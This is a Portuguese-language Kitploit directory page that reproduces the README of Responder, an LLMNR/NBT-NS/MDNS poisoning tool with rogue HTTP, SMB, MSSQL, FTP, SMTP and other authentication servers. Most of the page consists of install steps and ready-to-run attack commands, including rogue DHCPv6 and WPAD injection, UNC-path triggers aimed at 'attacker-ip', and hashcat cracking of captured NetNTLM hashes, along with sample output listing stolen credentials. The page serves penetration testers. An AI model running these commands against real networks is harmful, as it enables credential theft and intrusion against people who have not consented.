Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Responder — Responder é um envenenador de LLMNR, NBT-NS e MDNS, com servidor de autenticação rogue HTTP/SMB/MSSQL/FTP/LDAP integrado, suportando NTLMv1/NTLMv2/LMv2, Segurança Estendida NTLMSSP e autenticação HTTP Básica. | Kitploit
Ferramentas/GitHubGitHub/lgandx/responder
Quebra de SenhasReconhecimentoAtaques de SenhaEnumeração de DNS e SubdomíniosExploraçãoMovimento LateralColeta de InformaçõesSegurança de RedeTestes de PenetraçãoAutenticaçãoFuzzing de DNSRed Teaming
6.5k867123há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Análise de DNS
Top em Movimento Lateral nº7
Top em Ataques de Senha nº8
Top em Quebra de Senhas nº6
GitHublgandx/responder

Responder

Responder é um envenenador de LLMNR, NBT-NS e MDNS, com servidor de autenticação rogue HTTP/SMB/MSSQL/FTP/LDAP integrado, suportando NTLMv1/NTLMv2/LMv2, Segurança Estendida NTLMSSP e autenticação HTTP Básica.

Ver Repositório

Responder

Python Version License

Responder é um envenenador de LLMNR, NBT-NS e MDNS com servidores de autenticação falsos integrados para HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS e mais. Suporta NTLMv1/NTLMv2/LMv2, NTLMSSP com segurança estendida e vários métodos de autenticação em mais de 15 protocolos.


Índice

  • Visão Geral
  • Novidades
  • Instalação
  • Início Rápido
  • Envenenamento de Rede
  • Servidores Falsos
  • Configuração
  • macOS
  • Resolução de Problemas

Visão Geral

O Responder captura credenciais respondendo a requisições de resolução de nomes LLMNR, NBT-NS e MDNS. Quando um cliente tenta resolver um nome de host inexistente, o Responder responde, direcionando o cliente para a máquina do atacante, onde múltiplos servidores de autenticação falsos capturam as credenciais. Servidores falsos DHCP e DHCPv6 também estão incluídos e podem ser ativados separadamente.

Dados Capturados:

  • Hashes NetNTLMv1/v2 — Quebráveis com hashcat/john
  • Hashes Kerberos AS-REQ — Quebra offline (hashcat -m 7500)
  • Credenciais em texto claro — HTTP Basic, FTP, SMTP, IMAP, LDAP, SQL, etc.
  • Challenge-response — CRAM-MD5, DIGEST-MD5

Novidades

Esta versão inclui:

Melhorias no DHCPv6 e DNS

  • ✅ INFORMATION-REQUEST DHCPv6 — Compatibilidade total com Windows 10/11
  • ✅ Filtragem de Domínios — Mire em domínios específicos (DHCPv6 e DNS)
  • ✅ Anúncios de Roteador — Envenenamento de rede IPv6 opcional

Atualizações no Servidor de Email

  • ✅ SMTP STARTTLS — Capture de clientes de email modernos
  • ✅ IMAP STARTTLS — Porta 143 com upgrade TLS
  • ✅ IMAPS — SSL nativo na porta 993
  • ✅ POP3 Aprimorado — Melhor compatibilidade

Melhorias no Kerberos

  • ✅ Forçar AS-REQ — Forçar autenticação kerberos.
  • ✅ Tentar Fallback NTLM — Após capturar a autenticação kerberos, retornar KDC_ERR_ETYPE_NOSUPP

Aprimoramentos de Protocolo

  • ✅ MSSQL — Captura de autenticação do SQL Server
  • ✅ LDAP/LDAPS — Credenciais de serviços de diretório
  • ✅ RDP — Autenticação de Área de Trabalho Remota
  • ✅ WinRM — Gerenciamento Remoto do Windows
  • ✅ DCERPC — Autenticação RPC do Windows

Instalação

Requisitos

  • Python 2.7 ou Python 3.x
  • Linux (Ubuntu, Kali, Debian recomendados)
  • Privilégios de root

Dependências do Sistema```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

### Instalar Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

Verificar Instalação```bash

sudo python3 Responder.py --help

---

## Início Rápido

### Envenenamento Básico```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

Ataque DHCPv6```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

### Forçar HTTP Basic Auth```bash
sudo python3 Responder.py -I eth0 -b -v

Habilitar Proxy Auth + Rogue DHCP```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

---

## Envenenamento de Rede

### Envenenamento LLMNR/NBT-NS/MDNS

**Propósito:** Responder a falhas de resolução de nomes

**Como funciona:**
1. Cliente transmite consulta para host inexistente
2. Responder responde: "Sou esse host"
3. Cliente conecta-se ao atacante
4. Credenciais capturadas

**Configuração:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

Uso:```bash sudo python3 Responder.py -I eth0 -v

### Servidor DHCPv6

**Propósito:** Forçar clientes a usar o DNS do atacante via IPv6

**Recursos:**
- ✅ Suporte a INFORMATION-REQUEST (Windows 10/11)
- ✅ Suporte a SOLICIT/REQUEST
- ✅ Filtragem de domínio (direcionamento cirúrgico)
- ✅ Anúncio de Roteador (opcional)

**Como funciona:**
1. O Windows envia INFORMATION-REQUEST, SOLICIT, REQUEST via DHCPv6
2. O Responder responde: DNS = IPv6 do atacante
3. O Windows prioriza o DNS IPv6
4. Todas as consultas DNS → atacante
5. Envenenamento DNS → captura de credenciais

**Configuração:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

Uso:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

**Resultado Esperado:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

Servidores Rogue

O Responder inclui 17+ servidores de autenticação rogue:

Serviços de Arquivo e Rede

Servidor SMB (Portas 445, 139)

Propósito: Capturar hashes NetNTLM de compartilhamentos de arquivos

Funcionalidades:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ Captura de hashes NetNTLMv1/v2
  • ✅ Segurança Estendida NTLMSSP
  • ✅ Assinatura de sessão desabilitada (permite relay)

Triggers:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

**Formato Capturado:**```
username::domain:challenge:response:blob

Quebra:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

**Configuração:**```ini
[Responder Core]
SMB = On

Servidor FTP (Porta 21)

Objetivo: Capturar credenciais FTP em texto claro

Recursos:

  • ✅ Honeypot de login anônimo
  • ✅ Autenticação USER/PASS
  • ✅ Captura de credenciais em texto claro

Gatilhos:```bash ftp attacker-ip

Username: anything

Password: anything

**Formato Capturado:**```
[FTP] Cleartext: username:password

Configuração:```ini [Responder Core] FTP = On

---

### Servidores de Base de Dados

#### Servidor MSSQL (Porta 1433)

**Finalidade:** Capturar autenticação do Microsoft SQL Server

**Funcionalidades:**
- ✅ Autenticação do SQL Server
- ✅ Autenticação do Windows (NTLM)
- ✅ Credenciais SQL em texto claro
- ✅ Captura de hash NetNTLMv2

**Gatilhos:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

Formatos Capturados:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

**Configuração:**```ini
[Responder Core]
SQL = On

Notas:

  • Captura tanto autenticação SQL quanto autenticação Windows
  • Funciona com conexões SSMS, sqlcmd, ADO.NET
  • Pode capturar credenciais de domínio via autenticação Windows

Servidores de Email

Servidor SMTP (Porta 25, 587)

Propósito: Capturar autenticação de cliente de email

Recursos:

  • ✅ Suporte a STARTTLS (clientes modernos)
  • ✅ AUTH PLAIN (texto claro)
  • ✅ AUTH LOGIN (texto claro)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)
Baixar ferramenta